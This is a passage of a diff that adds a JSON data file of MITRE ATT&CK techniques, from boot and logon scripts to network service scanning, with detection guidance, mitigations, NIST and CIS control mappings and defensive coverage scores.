+            },
+            {
+                "mid": "M1017",
+                "name": "User Training",
+                "description": "Train users to be aware of access or manipulation attempts by an adversary to reduce the risk of successful spearphishing, social engineering, and other techniques that involve user interaction.",
+                "url": "https://attack.mitre.org/mitigations/M1017"
+            }
+        ],
+        "cumulative_score": 0.17142857142857143,
+        "adjusted_score": 0.17142857142857143,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [],
+        "nist_controls": [
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "IA-2",
+            "SI-4"
+        ],
+        "process_coverage": false,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1037",
+        "name": "Boot or Logon Initialization Scripts",
+        "description": "Adversaries may use scripts automatically executed at boot or logon initialization to establish persistence. Initialization scripts can be used to perform administrative functions, which may often execute other programs or send information to an internal logging server. These scripts can vary based on operating system and whether applied locally or remotely.  \n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. \n\nAn adversary may also be able to escalate their privileges since some boot or logon initialization scripts run with higher privileges.",
+        "url": "https://attack.mitre.org/techniques/T1037",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Object Modification",
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [
+            {
+                "tid": "T1037.001",
+                "name": "Boot or Logon Initialization Scripts: Logon Script (Windows)",
+                "url": "https://attack.mitre.org/techniques/T1037/001",
+                "description": "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. ",
+                "detection": "Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\\Environment\\UserInitMprLogonScript.\n\nMonitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+                "mitigations": [
+                    {
+                        "mid": "M1024",
+                        "name": "Restrict Registry Permissions",
+                        "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                        "url": "https://attack.mitre.org/mitigations/M1024"
+                    }
+                ]
+            },
+            {
+                "tid": "T1037.002",
+                "name": "Boot or Logon Initialization Scripts: Logon Script (Mac)",
+                "url": "https://attack.mitre.org/techniques/T1037/002",
+                "description": "Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook)\n\nAdversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. ",
+                "detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+                "mitigations": [
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1037.003",
+                "name": "Boot or Logon Initialization Scripts: Network Logon Script",
+                "url": "https://attack.mitre.org/techniques/T1037/003",
+                "description": "Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.  \n \nAdversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.",
+                "detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+                "mitigations": [
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1037.004",
+                "name": "Boot or Logon Initialization Scripts: RC Scripts",
+                "url": "https://attack.mitre.org/techniques/T1037/004",
+                "description": "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.\n\nAdversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.\n\nAdversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)\n\nSeveral Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)",
+                "detection": "Monitor for unexpected changes to RC scripts in the /etc/ directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior.\n\nMonitor for /etc/rc.local file creation. Although types of RC scripts vary for each Unix-like distribution, several execute /etc/rc.local if present. ",
+                "mitigations": [
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            },
+            {
+                "tid": "T1037.005",
+                "name": "Boot or Logon Initialization Scripts: Startup Items",
+                "url": "https://attack.mitre.org/techniques/T1037/005",
+                "description": "Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)\n\nThis is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. \n\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.",
+                "detection": "The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.\n\nMonitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.",
+                "mitigations": [
+                    {
+                        "mid": "M1022",
+                        "name": "Restrict File and Directory Permissions",
+                        "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                        "url": "https://attack.mitre.org/mitigations/M1022"
+                    }
+                ]
+            }
+        ],
+        "mitigations": [
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            },
+            {
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
+            }
+        ],
+        "cumulative_score": 0.34278039571428576,
+        "adjusted_score": 0.34278039571428576,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.7",
+            "3.3",
+            "4.1",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "AC-3",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.18571428571428572,
+            "mitigation_score": 0.2909090909090909,
+            "detection_score": 0.07
+        },
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0.00706611
+    },
+    {
+        "tid": "T1037.001",
+        "name": "Boot or Logon Initialization Scripts: Logon Script (Windows)",
+        "description": "Adversaries may use Windows logon scripts automatically executed at logon initialization to establish persistence. Windows allows logon scripts to be run whenever a specific user or group of users log into a system.(Citation: TechNet Logon Scripts) This is done via adding a path to a script to the HKCU\\Environment\\UserInitMprLogonScript Registry key.(Citation: Hexacorn Logon Scripts)\n\nAdversaries may use these scripts to maintain persistence on a single system. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary. ",
+        "url": "https://attack.mitre.org/techniques/T1037/001",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor for changes to Registry values associated with Windows logon scrips, nameley HKCU\\Environment\\UserInitMprLogonScript.\n\nMonitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation",
+            "Windows Registry: Windows Registry Key Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1037",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1024",
+                "name": "Restrict Registry Permissions",
+                "description": "Restrict the ability to modify certain hives or keys in the Windows Registry.",
+                "url": "https://attack.mitre.org/mitigations/M1024"
+            }
+        ],
+        "cumulative_score": 0.1523809523809524,
+        "adjusted_score": 0.1523809523809524,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.1"
+        ],
+        "nist_controls": [
+            "AC-17",
+            "CM-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1037.002",
+        "name": "Boot or Logon Initialization Scripts: Logon Script (Mac)",
+        "description": "Adversaries may use macOS logon scripts automatically executed at logon initialization to establish persistence. macOS allows logon scripts (known as login hooks) to be executed whenever a specific user logs into a system. A login hook tells Mac OS X to execute a certain script when a user logs in, but unlike [Startup Items](https://attack.mitre.org/techniques/T1037/005), a login hook executes as the elevated root user.(Citation: creating login hook)\n\nAdversaries may use these login hooks to maintain persistence on a single system.(Citation: S1 macOs Persistence) Access to login hook scripts may allow an adversary to insert additional malicious code. There can only be one login hook at a time though and depending on the access configuration of the hooks, either local credentials or an administrator account may be necessary. ",
+        "url": "https://attack.mitre.org/techniques/T1037/002",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+        "platforms": [
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1037",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.23333333333333334,
+        "adjusted_score": 0.23333333333333334,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.7",
+            "3.3",
+            "4.1",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1037.003",
+        "name": "Boot or Logon Initialization Scripts: Network Logon Script",
+        "description": "Adversaries may use network logon scripts automatically executed at logon initialization to establish persistence. Network logon scripts can be assigned using Active Directory or Group Policy Objects.(Citation: Petri Logon Script AD) These logon scripts run with the privileges of the user they are assigned to. Depending on the systems within the network, initializing one of these scripts could apply to more than one or potentially all systems.  \n \nAdversaries may use these scripts to maintain persistence on a network. Depending on the access configuration of the logon scripts, either local credentials or an administrator account may be necessary.",
+        "url": "https://attack.mitre.org/techniques/T1037/003",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor logon scripts for unusual access by abnormal users or at abnormal times. Look for files added or modified by unusual accounts outside of normal administration duties. Monitor running process for actions that could be indicative of abnormal programs or executables running upon logon.",
+        "platforms": [
+            "Windows"
+        ],
+        "data_sources": [
+            "Active Directory: Active Directory Object Modification",
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1037",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.23333333333333334,
+        "adjusted_score": 0.23333333333333334,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.7",
+            "3.3",
+            "4.1",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1037.004",
+        "name": "Boot or Logon Initialization Scripts: RC Scripts",
+        "description": "Adversaries may establish persistence by modifying RC scripts which are executed during a Unix-like system’s startup. These files allow system administrators to map and start custom services at startup for different run levels. RC scripts require root privileges to modify.\n\nAdversaries can establish persistence by adding a malicious binary path or shell commands to rc.local, rc.common, and other RC scripts specific to the Unix-like distribution.(Citation: IranThreats Kittens Dec 2017)(Citation: Intezer HiddenWasp Map 2019) Upon reboot, the system executes the script's contents as root, resulting in persistence.\n\nAdversary abuse of RC scripts is especially effective for lightweight Unix-like distributions using the root user as default, such as IoT or embedded systems.(Citation: intezer-kaiji-malware)\n\nSeveral Unix-like systems have moved to Systemd and deprecated the use of RC scripts. This is now a deprecated mechanism in macOS in favor of [Launchd](https://attack.mitre.org/techniques/T1053/004). (Citation: Apple Developer Doco Archive Launchd)(Citation: Startup Items) This technique can be used on Mac OS X Panther v10.3 and earlier versions which still execute the RC scripts.(Citation: Methods of Mac Malware Persistence) To maintain backwards compatibility some systems, such as Ubuntu, will execute the RC scripts if they exist with the correct file permissions.(Citation: Ubuntu Manpage systemd rc)",
+        "url": "https://attack.mitre.org/techniques/T1037/004",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "Monitor for unexpected changes to RC scripts in the /etc/ directory. Monitor process execution resulting from RC scripts for unusual or unknown applications or behavior.\n\nMonitor for /etc/rc.local file creation. Although types of RC scripts vary for each Unix-like distribution, several execute /etc/rc.local if present. ",
+        "platforms": [
+            "Linux",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1037",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.24761904761904763,
+        "adjusted_score": 0.24761904761904763,
+        "has_car": false,
+        "has_sigma": false,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "2.7",
+            "3.3",
+            "4.1",
+            "5.4",
+            "6.1",
+            "6.2",
+            "6.8"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1037.005",
+        "name": "Boot or Logon Initialization Scripts: Startup Items",
+        "description": "Adversaries may use startup items automatically executed at boot initialization to establish persistence. Startup items execute during the final phase of the boot process and contain shell scripts or other executable files along with configuration information used by the system to determine the execution order for all startup items. (Citation: Startup Items)\n\nThis is technically a deprecated technology (superseded by [Launch Daemon](https://attack.mitre.org/techniques/T1543/004)), and thus the appropriate folder, /Library/StartupItems isn’t guaranteed to exist on the system by default, but does appear to exist by default on macOS Sierra. A startup item is a directory whose executable and configuration property list (plist), StartupParameters.plist, reside in the top-level directory. \n\nAn adversary can create the appropriate folders/files in the StartupItems directory to register their own persistence mechanism (Citation: Methods of Mac Malware Persistence). Additionally, since StartupItems run during the bootup phase of macOS, they will run as the elevated root user.",
+        "url": "https://attack.mitre.org/techniques/T1037/005",
+        "tactics": [
+            "Persistence",
+            "Privilege Escalation"
+        ],
+        "detection": "The /Library/StartupItems folder can be monitored for changes. Similarly, the programs that are actually executed from this mechanism should be checked against a whitelist.\n\nMonitor processes that are executed during the bootup process to check for unusual or unknown applications and behavior.",
+        "platforms": [
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Creation",
+            "File: File Modification",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": true,
+        "supertechnique": "T1037",
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1022",
+                "name": "Restrict File and Directory Permissions",
+                "description": "Restrict access by setting directory and file permissions that are not specific to users or privileged accounts.",
+                "url": "https://attack.mitre.org/mitigations/M1022"
+            }
+        ],
+        "cumulative_score": 0.21904761904761905,
+        "adjusted_score": 0.21904761904761905,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": false,
+        "cis_controls": [
+            "2.7",
+            "3.3",
+            "4.1",
+            "6.1",
+            "6.2"
+        ],
+        "nist_controls": [
+            "AC-3",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "SI-3",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false
+    },
+    {
+        "tid": "T1039",
+        "name": "Data from Network Shared Drive",
+        "description": "Adversaries may search network shares on computers they have compromised to find files of interest. Sensitive data can be collected from remote systems via shared network drives (host shared directory, network file server, etc.) that are accessible from the current system prior to Exfiltration. Interactive command shells may be in use, and common functionality within [cmd](https://attack.mitre.org/software/S0106) may be used to gather information.",
+        "url": "https://attack.mitre.org/techniques/T1039",
+        "tactics": [
+            "Collection"
+        ],
+        "detection": "Monitor processes and command-line arguments for actions that could be taken to collect files from a network share. Remote access tools with built-in features may interact directly with the Windows API to gather data. Data may also be acquired through Windows system management tools such as [Windows Management Instrumentation](https://attack.mitre.org/techniques/T1047) and [PowerShell](https://attack.mitre.org/techniques/T1059/001).",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Network Share: Network Share Access"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [],
+        "cumulative_score": 0.11904761904761905,
+        "adjusted_score": 0.11904761904761905,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [],
+        "nist_controls": [],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.019047619047619046,
+            "detection_score": 0.04
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0
+    },
+    {
+        "tid": "T1040",
+        "name": "Network Sniffing",
+        "description": "Adversaries may sniff network traffic to capture information about an environment, including authentication material passed over the network. Network sniffing refers to using the network interface on a system to monitor or capture information sent over a wired or wireless connection. An adversary may place a network interface into promiscuous mode to passively access data in transit over the network, or use span ports to capture a larger amount of data.\n\nData captured via this technique may include user credentials, especially those sent over an insecure, unencrypted protocol. Techniques for name service resolution poisoning, such as [LLMNR/NBT-NS Poisoning and SMB Relay](https://attack.mitre.org/techniques/T1557/001), can also be used to capture credentials to websites, proxies, and internal systems by redirecting traffic to an adversary.\n\nNetwork sniffing may also reveal configuration details, such as running services, version numbers, and other network characteristics (e.g. IP addresses, hostnames, VLAN IDs) necessary for subsequent Lateral Movement and/or Defense Evasion activities.",
+        "url": "https://attack.mitre.org/techniques/T1040",
+        "tactics": [
+            "Credential Access",
+            "Discovery"
+        ],
+        "detection": "Detecting the events leading up to sniffing network traffic may be the best method of detection. From the host level, an adversary would likely need to perform a [Adversary-in-the-Middle](https://attack.mitre.org/techniques/T1557) attack against other devices on a wired network in order to capture traffic that was not to or from the current compromised system. This change in the flow of information is detectable at the enclave network level. Monitor for ARP spoofing and gratuitous ARP broadcasts. Detecting compromised network devices is a bit more challenging. Auditing administrator logins, configuration changes, and device images is required to detect malicious changes.",
+        "platforms": [
+            "Linux",
+            "Network",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "Process: Process Creation"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1041",
+                "name": "Encrypt Sensitive Information",
+                "description": "Protect sensitive information with strong encryption.",
+                "url": "https://attack.mitre.org/mitigations/M1041"
+            },
+            {
+                "mid": "M1032",
+                "name": "Multi-factor Authentication",
+                "description": "Use two or more pieces of evidence to authenticate to a system; such as username and password in addition to a token from a physical smart card or token generator.",
+                "url": "https://attack.mitre.org/mitigations/M1032"
+            }
+        ],
+        "cumulative_score": 0.38142308952380954,
+        "adjusted_score": 0.38142308952380954,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": true,
+        "cis_controls": [
+            "4.2",
+            "4.6",
+            "6.4",
+            "6.5",
+            "3.10"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-17",
+            "AC-18",
+            "AC-19",
+            "IA-2",
+            "IA-5",
+            "SC-4",
+            "SC-8",
+            "SI-12",
+            "SI-4",
+            "SI-7"
+        ],
+        "process_coverage": true,
+        "network_coverage": false,
+        "file_coverage": false,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.20952380952380953,
+            "mitigation_score": 0.2909090909090909,
+            "detection_score": 0.12
+        },
+        "choke_point_score": 0.15000000000000002,
+        "prevalence_score": 0.02189928
+    },
+    {
+        "tid": "T1041",
+        "name": "Exfiltration Over C2 Channel",
+        "description": "Adversaries may steal data by exfiltrating it over an existing command and control channel. Stolen data is encoded into the normal communications channel using the same protocol as command and control communications.",
+        "url": "https://attack.mitre.org/techniques/T1041",
+        "tactics": [
+            "Exfiltration"
+        ],
+        "detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)",
+        "platforms": [
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Command: Command Execution",
+            "File: File Access",
+            "Network Traffic: Network Connection Creation",
+            "Network Traffic: Network Traffic Content",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1057",
+                "name": "Data Loss Prevention",
+                "description": "Use a data loss prevention (DLP) strategy to categorize sensitive data, identify data formats indicative of personal identifiable information (PII), and restrict exfiltration of sensitive data.(Citation: PurpleSec Data Loss Prevention)",
+                "url": "https://attack.mitre.org/mitigations/M1057"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            }
+        ],
+        "cumulative_score": 0.31024587952380955,
+        "adjusted_score": 0.31024587952380955,
+        "has_car": false,
+        "has_sigma": true,
+        "has_es_siem": false,
+        "has_splunk": true,
+        "cis_controls": [
+            "13.3",
+            "13.8"
+        ],
+        "nist_controls": [
+            "AC-16",
+            "AC-2",
+            "AC-20",
+            "AC-23",
+            "AC-3",
+            "AC-4",
+            "AC-6",
+            "CA-3",
+            "CA-7",
+            "SA-8",
+            "SA-9",
+            "SC-13",
+            "SC-28",
+            "SC-31",
+            "SC-7",
+            "SI-3",
+            "SI-4",
+            "SR-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": true,
+        "cloud_coverage": false,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.20952380952380953,
+            "mitigation_score": 0.36363636363636365,
+            "detection_score": 0.04
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.00072207
+    },
+    {
+        "tid": "T1046",
+        "name": "Network Service Scanning",
+        "description": "Adversaries may attempt to get a listing of services running on remote hosts, including those that may be vulnerable to remote software exploitation. Methods to acquire this information include port scans and vulnerability scans using tools that are brought onto a system. \n\nWithin cloud environments, adversaries may attempt to discover services running on other cloud hosts. Additionally, if the cloud environment is connected to a on-premises environment, adversaries may be able to identify services running on non-cloud systems as well.",
+        "url": "https://attack.mitre.org/techniques/T1046",
+        "tactics": [
+            "Discovery"
+        ],
+        "detection": "System and network discovery techniques normally occur throughout an operation as an adversary learns the environment. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as Lateral Movement, based on the information obtained.\n\nNormal, benign system and network events from legitimate remote service scanning may be uncommon, depending on the environment and how they are used. Legitimate open port and vulnerability scanning may be conducted within the environment and will need to be deconflicted with any detection capabilities developed. Network intrusion detection systems can also be used to identify scanning activity. Monitor for process use of the networks and inspect intra-network flows to detect port scans.",
+        "platforms": [
+            "Containers",
+            "IaaS",
+            "Linux",
+            "Windows",
+            "macOS"
+        ],
+        "data_sources": [
+            "Cloud Service: Cloud Service Enumeration",
+            "Command: Command Execution",
+            "Network Traffic: Network Traffic Flow"
+        ],
+        "is_subtechnique": false,
+        "supertechnique": null,
+        "subtechniques": [],
+        "mitigations": [
+            {
+                "mid": "M1042",
+                "name": "Disable or Remove Feature or Program",
+                "description": "Remove or deny access to unnecessary and potentially vulnerable software to prevent abuse by adversaries.",
+                "url": "https://attack.mitre.org/mitigations/M1042"
+            },
+            {
+                "mid": "M1031",
+                "name": "Network Intrusion Prevention",
+                "description": "Use intrusion detection signatures to block traffic at network boundaries.",
+                "url": "https://attack.mitre.org/mitigations/M1031"
+            },
+            {
+                "mid": "M1030",
+                "name": "Network Segmentation",
+                "description": "Architect sections of the network to isolate critical systems, functions, or resources. Use physical and logical segmentation to prevent access to potentially sensitive systems and information. Use a DMZ to contain any internet-facing services that should not be exposed from the internal network. Configure separate virtual private cloud (VPC) instances to isolate critical cloud systems.",
+                "url": "https://attack.mitre.org/mitigations/M1030"
+            }
+        ],
+        "cumulative_score": 0.41094617523809523,
+        "adjusted_score": 0.41094617523809523,
+        "has_car": true,
+        "has_sigma": true,
+        "has_es_siem": true,
+        "has_splunk": false,
+        "cis_controls": [
+            "3.12",
+            "4.4",
+            "4.8",
+            "7.6",
+            "7.7",
+            "12.2",
+            "12.8",
+            "13.3",
+            "13.8",
+            "16.8",
+            "18.2",
+            "18.3",
+            "16.10"
+        ],
+        "nist_controls": [
+            "AC-4",
+            "CA-7",
+            "CM-2",
+            "CM-6",
+            "CM-7",
+            "CM-8",
+            "RA-5",
+            "SC-46",
+            "SC-7",
+            "SI-3",
+            "SI-4"
+        ],
+        "process_coverage": true,
+        "network_coverage": true,
+        "file_coverage": false,
+        "cloud_coverage": true,
+        "hardware_coverage": false,
+        "actionability_score": {
+            "combined_score": 0.29523809523809524,
+            "mitigation_score": 0.43636363636363634,
+            "detection_score": 0.14
+        },
+        "choke_point_score": 0.1,
+        "prevalence_score": 0.01570808
+    },
+    {
+        "tid": "T1047",
+        "name": "Windows Management Instrumentation",
